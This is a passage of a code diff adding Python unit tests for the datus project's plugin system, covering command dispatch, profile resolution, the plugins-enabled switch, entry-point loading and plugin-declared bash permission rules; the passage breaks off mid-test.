+    _dispatch_plugin_command(["hello", "version"])
+
+    assert load_calls == [{}]  # no config → datus default resolution
+
+
+def test_dispatch_unknown_plugin_returns_none(monkeypatch):
+    monkeypatch.setattr("datus.plugins.registry.plugin_entry_point_exists", lambda name: False)
+    assert _dispatch_plugin_command(["mystery", "x"]) is None
+
+
+def test_dispatch_broken_plugin_load_falls_through(monkeypatch):
+    """An entry point that exists but fails to load must fall through (None)."""
+    _patch_dispatch(monkeypatch, plugin_cls=_StubPlugin, profile_dict={})
+    monkeypatch.setattr("datus.plugins.registry.load_plugin_class", lambda name: None)
+    assert _dispatch_plugin_command(["hello", "version"]) is None
+
+
+def test_dispatch_flag_only_returns_none():
+    assert _dispatch_plugin_command(["--web"]) is None
+    assert _dispatch_plugin_command([]) is None
+
+
+def test_dispatch_reserved_name_returns_none():
+    for reserved in cli_main._RESERVED_SUBCOMMANDS:
+        assert _dispatch_plugin_command([reserved, "x"]) is None
+
+
+def test_dispatch_config_error_returns_3(monkeypatch):
+    monkeypatch.setattr("datus.plugins.registry.plugin_entry_point_exists", lambda name: True)
+    monkeypatch.setattr("datus.plugins.registry.load_plugin_class", lambda name: _StubPlugin)
+
+    def boom(**kwargs):
+        raise RuntimeError("bad config")
+
+    monkeypatch.setattr("datus.configuration.agent_config_loader.load_agent_config", boom)
+    assert _dispatch_plugin_command(["hello", "dags", "list"]) == 3
+
+
+def test_dispatch_plugin_run_error_returns_1(monkeypatch):
+    class _Boom:
+        def __init__(self, profile=None):
+            pass
+
+        def run_cli(self, argv):
+            raise RuntimeError("plugin blew up")
+
+    _patch_dispatch(monkeypatch, plugin_cls=_Boom, profile_dict={})
+    assert _dispatch_plugin_command(["hello", "dags", "list"]) == 1
+
+
+def test_dispatch_refused_when_plugins_disabled(monkeypatch, capsys):
+    _StubPlugin.last = {}
+    stub_cfg = _patch_dispatch(monkeypatch, plugin_cls=_StubPlugin, profile_dict={"name": "prod"})
+    stub_cfg.plugins_enabled = False
+
+    rc = _dispatch_plugin_command(["hello", "dags", "list"])
+
+    assert rc == 3
+    assert "plugins are disabled" in capsys.readouterr().err
+    # Neither profile resolution nor the plugin itself ran.
+    assert stub_cfg.requested == {}
+    assert _StubPlugin.last == {}
+
+
+def test_dispatch_disabled_never_imports_plugin(monkeypatch):
+    """With plugins disabled the plugin package must not even be loaded —
+    ``ep.load()`` runs arbitrary module-level code."""
+    stub_cfg = _patch_dispatch(monkeypatch, plugin_cls=_StubPlugin, profile_dict={})
+    stub_cfg.plugins_enabled = False
+
+    def must_not_load(name):
+        raise AssertionError("load_plugin_class must not be called when plugins are disabled")
+
+    monkeypatch.setattr("datus.plugins.registry.load_plugin_class", must_not_load)
+    assert _dispatch_plugin_command(["hello", "dags", "list"]) == 3
+
+
+def test_dispatch_run_cli_none_maps_to_zero(monkeypatch):
+    class _NoneRc:
+        def __init__(self, profile=None):
+            pass
+
+        def run_cli(self, argv):
+            return None
+
+    _patch_dispatch(monkeypatch, plugin_cls=_NoneRc, profile_dict={})
+    assert _dispatch_plugin_command(["hello", "version"]) == 0
+
+
+def _rc_plugin(rc_value):
+    class _Rc:
+        def __init__(self, profile=None):
+            pass
+
+        def run_cli(self, argv):
+            return rc_value
+
+    return _Rc
+
+
+def test_dispatch_run_cli_non_int_rc_does_not_crash(monkeypatch):
+    """A legacy handler returning a non-int (e.g. 'ok') must not crash a
+    successful run with ValueError."""
+    _patch_dispatch(monkeypatch, plugin_cls=_rc_plugin("ok"), profile_dict={})
+    assert _dispatch_plugin_command(["hello", "version"]) == 0
+
+
+def test_dispatch_run_cli_bool_rc_maps_to_exit_semantics(monkeypatch):
+    _patch_dispatch(monkeypatch, plugin_cls=_rc_plugin(True), profile_dict={})
+    assert _dispatch_plugin_command(["hello", "version"]) == 0
+    _patch_dispatch(monkeypatch, plugin_cls=_rc_plugin(False), profile_dict={})
+    assert _dispatch_plugin_command(["hello", "version"]) == 1

--- a/tests/unit_tests/configuration/test_agent_config.py
+++ b/tests/unit_tests/configuration/test_agent_config.py
@@ -2458,3 +2458,153 @@ class TestAgentConfigModelExtras:
     def test_get_extra_unknown_name_returns_empty(self, tmp_path):
         cfg = self._make(tmp_path, model_extras={"primary": {"foo": "bar"}})
         assert cfg.get_model_extra("custom/unknown") == {}
+
+
+class TestPluginProfiles:
+    """``init_plugin_services`` parsing + ``get_plugin_profile`` resolution."""
+
+    def _make(self, tmp_path, plugins=None, active_plugins=None):
+        return AgentConfig(
+            nodes={"test": NodeConfig(model="test-model", input=None)},
+            home=str(tmp_path / "h"),
+            target="mock",
+            models={"mock": {"type": "openai", "api_key": "k", "model": "m"}},
+            plugins=plugins or {},
+            active_plugins=active_plugins,
+            skip_init_dirs=True,
+        )
+
+    def test_parses_profiles_and_interpolates_env(self, tmp_path, monkeypatch):
+        monkeypatch.setenv("AF_PW", "s3cret")
+        cfg = self._make(
+            tmp_path,
+            plugins={
+                "hello": {
+                    "prod": {"api_base_url": "http://h/api/v1", "password": "${AF_PW}"},
+                    "staging": {"api_base_url": "http://s/api/v1"},
+                }
+            },
+        )
+        assert set(cfg.plugin_services["hello"]) == {"prod", "staging"}
+        # ``name`` is defaulted to the profile key; ``${VAR}`` is expanded.
+        assert cfg.plugin_services["hello"]["prod"]["name"] == "prod"
+        assert cfg.plugin_services["hello"]["prod"]["password"] == "s3cret"
+
+    def test_skips_malformed_entries(self, tmp_path):
+        cfg = self._make(
+            tmp_path,
+            plugins={"hello": {"good": {"api_base_url": "x"}, "bad": "not-a-mapping"}, "junk": "nope"},
+        )
+        assert set(cfg.plugin_services["hello"]) == {"good"}
+        # A non-mapping plugin section is skipped entirely.
+        assert "junk" not in cfg.plugin_services
+
+    def test_explicit_profile_wins(self, tmp_path):
+        cfg = self._make(
+            tmp_path,
+            plugins={"hello": {"prod": {"api_base_url": "p"}, "staging": {"api_base_url": "s"}}},
+        )
+        assert cfg.get_plugin_profile("hello", "staging")["api_base_url"] == "s"
+
+    def test_explicit_missing_profile_raises(self, tmp_path):
+        cfg = self._make(tmp_path, plugins={"hello": {"prod": {"api_base_url": "p"}}})
+        with pytest.raises(DatusException):
+            cfg.get_plugin_profile("hello", "nope")
+
+    def test_project_pin_between_flag_and_default(self, tmp_path):
+        cfg = self._make(
+            tmp_path,
+            plugins={"hello": {"prod": {"api_base_url": "p"}, "staging": {"api_base_url": "s"}}},
+            active_plugins={"hello": "staging"},
+        )
+        # No explicit profile → project pin selects ``staging``.
+        assert cfg.get_plugin_profile("hello")["api_base_url"] == "s"
+
+    def test_default_flag_selected(self, tmp_path):
+        cfg = self._make(
+            tmp_path,
+            plugins={
+                "hello": {
+                    "prod": {"api_base_url": "p", "default": True},
+                    "staging": {"api_base_url": "s"},
+                }
+            },
+        )
+        assert cfg.get_plugin_profile("hello")["api_base_url"] == "p"
+
+    def test_multiple_defaults_raises(self, tmp_path):
+        cfg = self._make(
+            tmp_path,
+            plugins={
+                "hello": {
+                    "a": {"api_base_url": "a", "default": True},
+                    "b": {"api_base_url": "b", "default": True},
+                }
+            },
+        )
+        with pytest.raises(DatusException):
+            cfg.get_plugin_profile("hello")
+
+    def test_sole_profile_selected(self, tmp_path):
+        cfg = self._make(tmp_path, plugins={"hello": {"only": {"api_base_url": "o"}}})
+        assert cfg.get_plugin_profile("hello")["api_base_url"] == "o"
+
+    def test_ambiguous_without_default_raises(self, tmp_path):
+        cfg = self._make(
+            tmp_path,
+            plugins={"hello": {"a": {"api_base_url": "a"}, "b": {"api_base_url": "b"}}},
+        )
+        with pytest.raises(DatusException):
+            cfg.get_plugin_profile("hello")
+
+    def test_no_config_returns_empty_dict(self, tmp_path):
+        cfg = self._make(tmp_path, plugins={})
+        # A plugin with no ``agent.plugins`` section → config-free, returns {}.
+        assert cfg.get_plugin_profile("hello") == {}
+
+    def test_stale_pin_falls_back_to_default(self, tmp_path):
+        cfg = self._make(
+            tmp_path,
+            plugins={"hello": {"prod": {"api_base_url": "p", "default": True}}},
+            active_plugins={"hello": "deleted"},
+        )
+        # Pin points at a profile that no longer exists → fall back to default.
+        assert cfg.get_plugin_profile("hello")["api_base_url"] == "p"
+
+
+class TestPluginsEnabledSwitch:
+    """``agent.plugins_enabled`` master switch for the plugin system."""
+
+    def _make(self, tmp_path, **extra):
+        return AgentConfig(
+            nodes={"test": NodeConfig(model="test-model", input=None)},
+            home=str(tmp_path / "h"),
+            target="mock",
+            models={"mock": {"type": "openai", "api_key": "k", "model": "m"}},
+            skip_init_dirs=True,
+            **extra,
+        )
+
+    def test_defaults_to_enabled(self, tmp_path):
+        cfg = self._make(tmp_path)
+        assert cfg.plugins_enabled is True
+
+    @pytest.mark.parametrize("value", [False, "false", "no", "off", "0"])
+    def test_disabled_values(self, tmp_path, value):
+        cfg = self._make(tmp_path, plugins_enabled=value)
+        assert cfg.plugins_enabled is False
+
+    @pytest.mark.parametrize("value", [True, "true", "yes", "on", "1"])
+    def test_enabled_values(self, tmp_path, value):
+        cfg = self._make(tmp_path, plugins_enabled=value)
+        assert cfg.plugins_enabled is True
+
+    def test_disabled_ignores_plugins_section(self, tmp_path):
+        cfg = self._make(
+            tmp_path,
+            plugins_enabled=False,
+            plugins={"hello": {"prod": {"api_base_url": "p", "default": True}}},
+        )
+        # The whole ``agent.plugins`` section is ignored when disabled.
+        assert cfg.plugin_services == {}
+        assert cfg.get_plugin_profile("hello") == {}

--- a/tests/unit_tests/configuration/test_agent_config_loader.py
+++ b/tests/unit_tests/configuration/test_agent_config_loader.py
@@ -635,6 +635,27 @@ class TestApplyProjectOverrideBashAllow:
         assert agent_raw["permissions"]["profile"] == "normal"
         assert agent_raw["permissions"]["bash_commands"] == {"allow": ["make:*"]}
 
+    def test_raw_grant_list_forwarded_for_ask_rule_bypass(self):
+        """The raw bash_allow list also rides as ``project_bash_allow`` so
+        PermissionManager can bypass ask-rule hits on an exact grant match
+        (merged allow entries lose to ask rules at evaluation time)."""
+        agent_raw = {"target": "openai", "models": {"openai": {}}}
+        with patch(
+            "datus.configuration.agent_config_loader.load_project_override",
+            return_value=ProjectOverride(bash_allow=["datus hello config set:*"]),
+        ):
+            _apply_project_override(agent_raw)
+        assert agent_raw["project_bash_allow"] == ["datus hello config set:*"]
+
+    def test_no_bash_allow_leaves_grant_list_unset(self):
+        agent_raw = {"target": "openai", "models": {"openai": {}}}
+        with patch(
+            "datus.configuration.agent_config_loader.load_project_override",
+            return_value=ProjectOverride(project_name="p"),
+        ):
+            _apply_project_override(agent_raw)
+        assert "project_bash_allow" not in agent_raw
+
 
 class TestPermissionModeCliOverride:
     """--permission-mode kwarg reshapes permissions.profile at load time."""

--- a/tests/unit_tests/configuration/test_agent_config_permissions.py
+++ b/tests/unit_tests/configuration/test_agent_config_permissions.py
@@ -8,15 +8,19 @@ from datus.configuration.agent_config import AgentConfig
 from datus.tools.permission.permission_config import PermissionLevel
 
 
-def _make_config(permissions_raw):
+def _make_config(permissions_raw, plugins_enabled=False):
     """Build a bare AgentConfig exercising only ``_init_permissions_config``.
 
     Real AgentConfig.__init__ requires substantial YAML; for these tests we
     instantiate with ``__new__`` and call the helper directly. If the
     project adds a richer fixture helper later, prefer that.
+
+    ``plugins_enabled`` defaults to False so assertions stay hermetic on
+    machines that happen to have real datus plugins installed.
     """
     cfg = AgentConfig.__new__(AgentConfig)
     cfg.active_profile_name = "normal"  # pre-seed so loader can overwrite
+    cfg.plugins_enabled = plugins_enabled
     cfg.permissions_config = cfg._init_permissions_config(permissions_raw or {})
     return cfg
 
@@ -197,3 +201,75 @@ def test_non_string_profile_field_falls_back_to_normal(caplog):
         "Invalid permissions.profile" in rec.message or "Falling back to 'normal'" in rec.message
         for rec in caplog.records
     )
+
+
+# ---------------------------------------------------------------------------
+# Plugin-declared CLI bash rules
+# ---------------------------------------------------------------------------
+
+
+def _hello_rules_map():
+    from datus.tools.permission.bash_rules import BashCommandRules
+
+    return {"normal": BashCommandRules(allow=["datus hello greet:*"])}
+
+
+def test_plugin_rules_collected_and_merged_when_enabled(monkeypatch):
+    from datus.plugins import registry
+
+    monkeypatch.setattr(registry, "collect_plugin_cli_permissions", _hello_rules_map)
+    cfg = _make_config({}, plugins_enabled=True)
+
+    assert set(cfg.plugin_bash_rules) == {"normal"}
+    assert "datus hello greet:*" in cfg.permissions_config.bash_commands.allow
+
+
+def test_plugin_rules_not_collected_when_disabled(monkeypatch):
+    from datus.plugins import registry
+
+    called = []
+
+    def spy():
+        called.append(True)
+        return _hello_rules_map()
+
+    monkeypatch.setattr(registry, "collect_plugin_cli_permissions", spy)
+    cfg = _make_config({}, plugins_enabled=False)
+
+    assert called == []
+    assert cfg.plugin_bash_rules == {}
+    assert all("datus hello" not in p for p in cfg.permissions_config.bash_commands.allow)
+
+
+def test_plugin_collection_failure_does_not_block_config(monkeypatch, caplog):
+    import logging
+
+    from datus.plugins import registry
+
+    def boom():
+        raise RuntimeError("collector exploded")
+
+    monkeypatch.setattr(registry, "collect_plugin_cli_permissions", boom)
+    with caplog.at_level(logging.WARNING):
+        cfg = _make_config({}, plugins_enabled=True)
+
+    assert cfg.plugin_bash_rules == {}
+    assert cfg.permissions_config is not None
+    assert "Plugin CLI permission collection failed" in caplog.text
+
+
+def test_plugin_rules_inactive_profile_not_merged(monkeypatch):
+    from datus.plugins import registry
+    from datus.tools.permission.bash_rules import BashCommandRules
+
+    monkeypatch.setattr(
+        registry,
+        "collect_plugin_cli_permissions",
+        lambda: {"auto": BashCommandRules(allow=["datus hello greet:*"])},
+    )
+    cfg = _make_config({}, plugins_enabled=True)  # active profile: normal
+
+    # The auto-only declaration is stored for runtime switches but not merged
+    # into the normal effective config.
+    assert set(cfg.plugin_bash_rules) == {"auto"}
+    assert all("datus hello" not in p for p in cfg.permissions_config.bash_commands.allow)

--- a/tests/unit_tests/configuration/test_project_config.py
+++ b/tests/unit_tests/configuration/test_project_config.py
@@ -214,6 +214,7 @@ class TestAllowedKeys:
                 "dashboard",
                 "scheduler",
                 "semantic",
+                "plugins",
                 "project_name",
                 "language",
                 "reasoning_effort",
@@ -234,6 +235,7 @@ class TestProjectOverrideDataclass:
             ("dashboard", "superset"),
             ("scheduler", "airflow"),
             ("semantic", "metricflow"),
+            ("plugins", {"hello": "prod"}),
             ("project_name", "z"),
             ("language", "zh"),
             ("reasoning_effort", "high"),
@@ -412,6 +414,36 @@ class TestBashAllow:
         assert result.bash_allow == ["find:*\\", 'grep:"quoted"']
         # The rest of the file still parses.
         assert result.project_name == "proj_a"
+
+
+class TestPluginsPin:
+    """``plugins:`` maps a plugin name to the profile ``datus <plugin>`` uses."""
+
+    def test_load_plugins_mapping(self, tmp_path):
+        path = tmp_path / PROJECT_CONFIG_REL
+        path.parent.mkdir(parents=True)
+        path.write_text(yaml.safe_dump({"plugins": {"hello": "prod", "dagster": "dev"}}))
+        result = load_project_override(str(tmp_path))
+        assert result.plugins == {"hello": "prod", "dagster": "dev"}
+        assert not result.is_empty()
+
+    def test_non_mapping_dropped(self, tmp_path):
+        path = tmp_path / PROJECT_CONFIG_REL
+        path.parent.mkdir(parents=True)
+        path.write_text(yaml.safe_dump({"plugins": "hello"}))
+        assert load_project_override(str(tmp_path)).plugins is None
+
+    def test_non_string_profile_dropped(self, tmp_path):
+        path = tmp_path / PROJECT_CONFIG_REL
+        path.parent.mkdir(parents=True)
+        path.write_text(yaml.safe_dump({"plugins": {"hello": "prod", "bad": 123}}))
+        assert load_project_override(str(tmp_path)).plugins == {"hello": "prod"}
+
+    def test_plugins_save_round_trip(self, tmp_path):
+        save_project_override(ProjectOverride(plugins={"hello": "staging"}), cwd=str(tmp_path))
+        result = load_project_override(str(tmp_path))
+        assert result.plugins == {"hello": "staging"}
+        assert not result.is_empty()
 
     def test_save_round_trips_bash_allow(self, tmp_path):
         override = ProjectOverride(bash_allow=["make:*"])

--- a/tests/unit_tests/conftest.py
+++ b/tests/unit_tests/conftest.py
@@ -90,6 +90,21 @@ def _isolate_project_cwd(monkeypatch, tmp_path):
     monkeypatch.chdir(tmp_path)
 
 
+@pytest.fixture(autouse=True)
+def _reset_plugin_registry_cache():
+    """Invalidate the process-level plugin class cache around every test.
+
+    ``datus.plugins.registry`` memoizes loaded entry-point classes for the
+    process lifetime; tests that monkeypatch ``importlib.metadata.entry_points``
+    would otherwise see stale plugins from a previous test.
+    """
+    from datus.plugins.registry import invalidate_plugin_cache
+
+    invalidate_plugin_cache()
+    yield
+    invalidate_plugin_cache()
+
+
 @pytest.fixture(autouse=True, scope="session")
 def _disable_langsmith_tracing():
     """Disable LangSmith/LangChain tracing for the unit test session only.

--- a/tests/unit_tests/plugins/test_registry.py
+++ b/tests/unit_tests/plugins/test_registry.py
@@ -1,0 +1,567 @@
+# Copyright 2025-present DatusAI, Inc.
+# Licensed under the Apache License, Version 2.0.
+# See http://www.apache.org/licenses/LICENSE-2.0 for details.
+
+"""Unit tests for ``datus.plugins.registry`` (``datus.plugins`` discovery)."""
+
+import importlib.metadata as importlib_metadata
+
+from datus.plugins import registry
+
+
+class _FakeEntryPoint:
+    def __init__(self, name, obj, *, raises=False, group="datus.plugins"):
+        self.name = name
+        self.group = group
+        self._obj = obj
+        self._raises = raises
+
+    def load(self):
+        if self._raises:
+            raise ImportError("cannot import plugin")
+        return self._obj
+
+
+class _FakeEntryPoints:
+    def __init__(self, eps):
+        self._eps = eps
+
+    def select(self, *, group, name=None):
+        out = [ep for ep in self._eps if ep.group == group]
+        if name is not None:
+            out = [ep for ep in out if ep.name == name]
+        return out
+
+
+def _patch(monkeypatch, eps):
+    monkeypatch.setattr(importlib_metadata, "entry_points", lambda: _FakeEntryPoints(eps))
+
+
+class _Plugin:
+    """A minimal well-formed plugin class."""
+
+    def __init__(self, profile=None):
+        self.profile = profile or {}
+
+    @classmethod
+    def skills_dir(cls):  # overridden per-test via monkeypatch when a real dir is needed
+        return None
+
+    def run_cli(self, argv):
+        return 0
+
+
+def test_load_plugin_class_matching(monkeypatch):
+    _patch(monkeypatch, [_FakeEntryPoint("hello", _Plugin)])
+    assert registry.load_plugin_class("hello") is _Plugin
+
+
+def test_load_plugin_class_unknown_returns_none(monkeypatch):
+    _patch(monkeypatch, [_FakeEntryPoint("hello", _Plugin)])
+    assert registry.load_plugin_class("mystery") is None
+
+
+def test_load_plugin_class_load_failure_returns_none(monkeypatch):
+    _patch(monkeypatch, [_FakeEntryPoint("hello", _Plugin, raises=True)])
+    assert registry.load_plugin_class("hello") is None
+
+
+def test_load_plugin_class_multiple_uses_first(monkeypatch):
+    class _Other(_Plugin):
+        pass
+
+    _patch(monkeypatch, [_FakeEntryPoint("hello", _Plugin), _FakeEntryPoint("hello", _Other)])
+    assert registry.load_plugin_class("hello") is _Plugin
+
+
+def test_iter_plugin_entry_points(monkeypatch):
+    eps = [_FakeEntryPoint("hello", _Plugin), _FakeEntryPoint("dagster", _Plugin)]
+    _patch(monkeypatch, eps)
+    assert {ep.name for ep in registry.iter_plugin_entry_points()} == {"hello", "dagster"}
+
+
+def test_plugin_skill_directories_collects_existing(monkeypatch, tmp_path):
+    skill_dir = tmp_path / "skills"
+    skill_dir.mkdir()
+
+    class _WithSkills(_Plugin):
+        @classmethod
+        def skills_dir(cls):
+            return str(skill_dir)
+
+    _patch(monkeypatch, [_FakeEntryPoint("hello", _WithSkills)])
+    assert registry.plugin_skill_directories() == [str(skill_dir)]
+
+
+def test_plugin_skill_directories_skips_missing_dir(monkeypatch):
+    class _BadDir(_Plugin):
+        @classmethod
+        def skills_dir(cls):
+            return "/no/such/dir/at/all"
+
+    _patch(monkeypatch, [_FakeEntryPoint("hello", _BadDir)])
+    assert registry.plugin_skill_directories() == []
+
+
+def test_plugin_skill_directories_skips_plugin_without_skills(monkeypatch):
+    class _NoSkills:
+        def run_cli(self, argv):
+            return 0
+
+    _patch(monkeypatch, [_FakeEntryPoint("hello", _NoSkills)])
+    assert registry.plugin_skill_directories() == []
+
+
+def test_plugin_skill_directories_dedup(monkeypatch, tmp_path):
+    skill_dir = tmp_path / "skills"
+    skill_dir.mkdir()
+
+    class _WithSkills(_Plugin):
+        @classmethod
+        def skills_dir(cls):
+            return str(skill_dir)
+
+    _patch(monkeypatch, [_FakeEntryPoint("a", _WithSkills), _FakeEntryPoint("b", _WithSkills)])
+    # Same directory contributed by two plugins is de-duplicated.
+    assert registry.plugin_skill_directories() == [str(skill_dir)]
+
+
+def test_plugin_skill_directories_survives_bad_plugin(monkeypatch, tmp_path):
+    skill_dir = tmp_path / "skills"
+    skill_dir.mkdir()
+
+    class _WithSkills(_Plugin):
+        @classmethod
+        def skills_dir(cls):
+            return str(skill_dir)
+
+    _patch(
+        monkeypatch,
+        [_FakeEntryPoint("broken", _Plugin, raises=True), _FakeEntryPoint("hello", _WithSkills)],
+    )
+    # A broken plugin is skipped; the good one still contributes.
+    assert registry.plugin_skill_directories() == [str(skill_dir)]
+
+
+def test_lookup_never_raises_on_entry_points_failure(monkeypatch):
+    def boom():
+        raise RuntimeError("entry_points exploded")
+
+    monkeypatch.setattr(importlib_metadata, "entry_points", boom)
+    assert registry.load_plugin_class("hello") is None
+    assert registry.iter_plugin_entry_points() == []
+    assert registry.plugin_skill_directories() == []
+    assert registry.plugin_system_prompt_sections(_FakeConfig({})) == []
+
+
+class _FakeConfig:
+    """Stand-in for AgentConfig exposing only ``plugin_services``."""
+
+    def __init__(self, plugin_services):
+        self.plugin_services = plugin_services
+
+
+def test_system_prompt_sections_collects_and_passes_profiles(monkeypatch):
+    captured = {}
+
+    class _WithPrompt(_Plugin):
+        @classmethod
+        def system_prompt(cls, profiles):
+            captured["profiles"] = profiles
+            return "## Hello\nManage DAGs."
+
+    profiles = {"local": {"name": "local", "api_base_url": "http://h"}}
+    _patch(monkeypatch, [_FakeEntryPoint("hello", _WithPrompt)])
+    cfg = _FakeConfig({"hello": profiles})
+
+    sections = registry.plugin_system_prompt_sections(cfg)
+
+    # A datus-owned config-location preamble is prepended to plugin sections.
+    assert len(sections) == 2
+    assert sections[0].startswith("## Plugins")
+    assert sections[1] == "## Hello\nManage DAGs."
+    # datus indexes plugin_services by the entry-point name and passes it verbatim.
+    assert captured["profiles"] is profiles
+
+
+def test_system_prompt_sections_skips_plugin_without_hook(monkeypatch):
+    class _NoPrompt:
+        def run_cli(self, argv):
+            return 0
+
+    _patch(monkeypatch, [_FakeEntryPoint("hello", _NoPrompt)])
+    assert registry.plugin_system_prompt_sections(_FakeConfig({"hello": {"p": {}}})) == []
+
+
+def test_system_prompt_sections_filters_empty_and_none(monkeypatch):
+    class _Empty(_Plugin):
+        @classmethod
+        def system_prompt(cls, profiles):
+            return "   "
+
+    class _NoneRet(_Plugin):
+        @classmethod
+        def system_prompt(cls, profiles):
+            return None
+
+    _patch(monkeypatch, [_FakeEntryPoint("a", _Empty), _FakeEntryPoint("b", _NoneRet)])
+    assert registry.plugin_system_prompt_sections(_FakeConfig({})) == []
+
+
+def test_system_prompt_sections_survives_raising_plugin(monkeypatch):
+    class _Boom(_Plugin):
+        @classmethod
+        def system_prompt(cls, profiles):
+            raise RuntimeError("nope")
+
+    class _Good(_Plugin):
+        @classmethod
+        def system_prompt(cls, profiles):
+            return "## Good"
+
+    _patch(monkeypatch, [_FakeEntryPoint("boom", _Boom), _FakeEntryPoint("good", _Good)])
+    # A raising plugin is skipped; the good one still contributes (after the preamble).
+    sections = registry.plugin_system_prompt_sections(_FakeConfig({}))
+    assert sections[0].startswith("## Plugins")
+    assert sections[1:] == ["## Good"]
+
+
+def test_system_prompt_sections_defaults_missing_profiles_to_empty(monkeypatch):
+    captured = {}
+
+    class _WithPrompt(_Plugin):
+        @classmethod
+        def system_prompt(cls, profiles):
+            captured["profiles"] = profiles
+            return None
+
+    _patch(monkeypatch, [_FakeEntryPoint("hello", _WithPrompt)])
+    # No ``hello`` key in plugin_services -> the plugin receives an empty dict.
+    registry.plugin_system_prompt_sections(_FakeConfig({}))
+    assert captured["profiles"] == {}
+
+
+class _WithStaticPrompt(_Plugin):
+    @classmethod
+    def system_prompt(cls, profiles):
+        return "## Hello\nManage DAGs."
+
+
+def test_preamble_names_config_file_location(monkeypatch):
+    _patch(monkeypatch, [_FakeEntryPoint("hello", _WithStaticPrompt)])
+    monkeypatch.setattr(registry, "_agent_config_location", lambda: "/srv/conf/agent.yml")
+
+    sections = registry.plugin_system_prompt_sections(_FakeConfig({}))
+
+    assert "`/srv/conf/agent.yml`" in sections[0]
+    assert "agent.plugins.<plugin>.<profile>" in sections[0]
+
+
+def test_preamble_degrades_without_config_path(monkeypatch):
+    _patch(monkeypatch, [_FakeEntryPoint("hello", _WithStaticPrompt)])
+    monkeypatch.setattr(registry, "_agent_config_location", lambda: None)
+
+    sections = registry.plugin_system_prompt_sections(_FakeConfig({}))
+
+    assert sections[0].startswith("## Plugins")
+    assert "agent.plugins.<plugin>.<profile>" in sections[0]
+    assert "agent.yml" in sections[0]  # generic wording instead of a path
+
+
+def test_agent_config_location_prefers_loaded_manager(monkeypatch):
+    from datus.configuration import agent_config_loader
+
+    class _Mgr:
+        config_path = "/opt/datus/agent.yml"
+
+    monkeypatch.setattr(agent_config_loader, "CONFIGURATION_MANAGER", _Mgr())
+    assert registry._agent_config_location() == "/opt/datus/agent.yml"
+
+
+def test_agent_config_location_none_when_unresolvable(monkeypatch):
+    from datus.configuration import agent_config_loader
+
+    monkeypatch.setattr(agent_config_loader, "CONFIGURATION_MANAGER", None)
+
+    def boom(*args, **kwargs):
+        raise RuntimeError("no config anywhere")
+
+    monkeypatch.setattr(agent_config_loader, "parse_config_path", boom)
+    assert registry._agent_config_location() is None
+
+
+# ---------------------------------------------------------------------------
+# collect_plugin_cli_permissions
+# ---------------------------------------------------------------------------
+
+
+class _WithCliPerms(_Plugin):
+    @classmethod
+    def cli_permissions(cls):
+        return {
+            "normal": {"allow": ["greet:*", "version"], "ask": ["config set:*"], "deny": ["config wipe:*"]},
+            "auto": {"allow": [":*"]},
+        }
+
+
+def test_cli_permissions_prefixing_and_shapes(monkeypatch):
+    _patch(monkeypatch, [_FakeEntryPoint("hello", _WithCliPerms)])
+    rules = registry.collect_plugin_cli_permissions()
+
+    assert set(rules) == {"normal", "auto"}
+    # ``greet:*`` -> prefix rule; ``version`` (no colon) -> exact match.
+    assert rules["normal"].allow == ["datus hello greet:*", "datus hello version"]
+    assert rules["normal"].ask == ["datus hello config set:*"]
+    assert rules["normal"].deny == ["datus hello config wipe:*"]
+    # ``:*`` covers the whole namespace.
+    assert rules["auto"].allow == ["datus hello:*"]
+    assert rules["auto"].ask == []
+
+
+def test_cli_permissions_never_set_scalar_fields(monkeypatch):
+    _patch(monkeypatch, [_FakeEntryPoint("hello", _WithCliPerms)])
+    rules = registry.collect_plugin_cli_permissions()
+    # ``default`` / ``classifier`` must stay unset so the profile posture and
+    # merge_with scalar semantics are untouched by plugin declarations.
+    for ruleset in rules.values():
+        assert "default" not in ruleset.model_fields_set
+        assert "classifier" not in ruleset.model_fields_set
+
+
+def test_cli_permissions_dangerous_and_unknown_profiles_dropped(monkeypatch, caplog):
+    class _Overreaching(_Plugin):
+        @classmethod
+        def cli_permissions(cls):
+            return {
+                "dangerous": {"deny": ["config wipe:*"]},
+                "paranoid": {"ask": ["greet:*"]},
+                "normal": {"allow": ["greet:*"]},
+            }
+
+    _patch(monkeypatch, [_FakeEntryPoint("hello", _Overreaching)])
+    with caplog.at_level("WARNING"):
+        rules = registry.collect_plugin_cli_permissions()
+
+    assert set(rules) == {"normal"}
+    assert "dangerous" in caplog.text
+    assert "paranoid" in caplog.text
+
+
+def test_cli_permissions_malformed_entries_skipped(monkeypatch):
+    class _Malformed(_Plugin):
+        @classmethod
+        def cli_permissions(cls):
+            return {
+                "normal": {
+                    "allow": ["greet:*", 42, "", "   "],  # non-str / empty entries dropped
+                    "ask": "not-a-list",  # non-list action dropped
+                    "grant": ["greet:*"],  # unknown action dropped
+                },
+                "auto": ["not-a-dict"],  # non-dict profile dropped
+            }
+
+    _patch(monkeypatch, [_FakeEntryPoint("hello", _Malformed)])
+    rules = registry.collect_plugin_cli_permissions()
+
+    assert set(rules) == {"normal"}
+    assert rules["normal"].allow == ["datus hello greet:*"]
+    assert rules["normal"].ask == []
+    assert rules["normal"].deny == []
+
+
+def test_cli_permissions_non_dict_hook_ignored(monkeypatch):
+    class _WrongType(_Plugin):
+        @classmethod
+        def cli_permissions(cls):
+            return ["normal"]
+
+    _patch(monkeypatch, [_FakeEntryPoint("hello", _WrongType)])
+    assert registry.collect_plugin_cli_permissions() == {}
+
+
+def test_cli_permissions_plain_dict_attribute_accepted(monkeypatch):
+    class _AttrStyle(_Plugin):
+        cli_permissions = {"normal": {"allow": ["greet:*"]}}
+
+    _patch(monkeypatch, [_FakeEntryPoint("hello", _AttrStyle)])
+    rules = registry.collect_plugin_cli_permissions()
+    assert rules["normal"].allow == ["datus hello greet:*"]
+
+
+def test_cli_permissions_raising_hook_skips_only_that_plugin(monkeypatch):
+    class _Boom(_Plugin):
+        @classmethod
+        def cli_permissions(cls):
+            raise RuntimeError("nope")
+
+    _patch(monkeypatch, [_FakeEntryPoint("boom", _Boom), _FakeEntryPoint("hello", _WithCliPerms)])
+    rules = registry.collect_plugin_cli_permissions()
+    assert rules["normal"].allow == ["datus hello greet:*", "datus hello version"]
+
+
+def test_cli_permissions_plugin_without_hook_skipped(monkeypatch):
+    class _NoHook:
+        def run_cli(self, argv):
+            return 0
+
+    _patch(monkeypatch, [_FakeEntryPoint("hello", _NoHook)])
+    assert registry.collect_plugin_cli_permissions() == {}
+
+
+def test_cli_permissions_duplicate_entry_point_first_wins(monkeypatch, caplog):
+    class _Second(_Plugin):
+        @classmethod
+        def cli_permissions(cls):
+            return {"normal": {"allow": ["other:*"]}}
+
